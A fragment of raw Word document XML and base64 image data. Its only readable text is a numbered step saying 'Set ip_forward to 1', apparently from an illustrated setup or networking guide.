Dj+N2hXWoeRBHPLH&#10;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&#10;ag3IkPCr4i3nicw4GFgskznoPNP/6f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hHES8gwQAADYTAAAOAAAAAAAAAAAAAAAAAD0CAABkcnMvZTJvRG9jLnhtbFBL&#10;AQItAAoAAAAAAAAAIQCPeGakJsgAACbIAAAUAAAAAAAAAAAAAAAAAOwGAABkcnMvbWVkaWEvaW1h&#10;Z2UxLmpwZ1BLAQItABQABgAIAAAAIQBXXOek3QAAAAUBAAAPAAAAAAAAAAAAAAAAAETPAABkcnMv&#10;ZG93bnJldi54bWxQSwECLQAUAAYACAAAACEAN53BGLoAAAAhAQAAGQAAAAAAAAAAAAAAAABO0AAA&#10;ZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc1BLBQYAAAAABgAGAHwBAAA/0QAAAAA=&#10;">
                <v:rect id="Rectangle 2549" o:spid="_x0000_s1152" style="position:absolute;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566C2192" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2550" o:spid="_x0000_s1153" style="position:absolute;top:2026;width:713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6EECCA6A"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3 :</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2551" o:spid="_x0000_s1154" style="position:absolute;left:5348;top:2026;width:56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59C693E6" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2552" o:spid="_x0000_s1155" style="position:absolute;left:5775;top:2026;width:16874;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48E4C848" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Set </w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>ip_forward</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> to 1</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2553" o:spid="_x0000_s1156" style="position:absolute;left:18474;top:202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505E2625" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2554" o:spid="_x0000_s1157" style="position:absolute;left:59448;top:36125;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21DDC168" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 2562" o:spid="_x0000_s1158" type="#_x0000_t75" style="position:absolute;left:383;top:3890;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YINxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvQr/D8gq96aaBikRXkUJBL61/Aub4yD6zsdm3Ibs16bd3BcHjMDO/YRarwTbiSp2vHSt4nyQg&#10;iEuna64U5Mev8QyED8gaG8ek4J88rJYvowVm2vW8p+shVCJC2GeowITQZlL60pBFP3EtcfTOrrMY&#10;ouwqqTvsI9w2Mk2SqbRYc1ww2NKnofL38GcVfHu9bgL9aHPpTzvM62JbzAql3l6H9RxEoCE8w4/2&#10;RitIP6Yp3N/EJyCXNwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQB14YINxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;">
                  <v:imagedata r:id="rId50" o:title=""/>
                </v:shape>
                <v:shape id="Shape 2563" o:spid="_x0000_s1159" style="position:absolute;left:256;top:3763;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D9xAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvC36H8ARva2p1RapRZFfFo/9AvD2aZ1tsXkoTbf32RljwOMzMb5jZojWleFDtCssKBv0IBHFq&#10;dcGZgtNx/T0B4TyyxtIyKXiSg8W88zXDRNuG9/Q4+EwECLsEFeTeV4mULs3JoOvbijh4V1sb9EHW&#10;mdQ1NgFuShlH0VgaLDgs5FjRb07p7XA3ClZNfPaX3eY2GVytrkbZHw93R6V63XY5BeGp9Z/wf3ur&#10;FcQ/4yG834QnIOcvAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAB6uQP3EAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E2D617" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673C04D6" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04926B16" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0022E4FE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24"/>
        <w:ind w:left="40" w:right="-185"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A63FEA1" wp14:editId="592C329D">
                <wp:extent cx="5961279" cy="3385588"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="41616" name="Group 41616"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5961279" cy="3385588"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5961279" cy="3385588"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2629" name="Rectangle 2629"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5919216" y="3236388"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="796FEE3C"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2633" name="Picture 2633"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId51"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="12700" y="12700"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
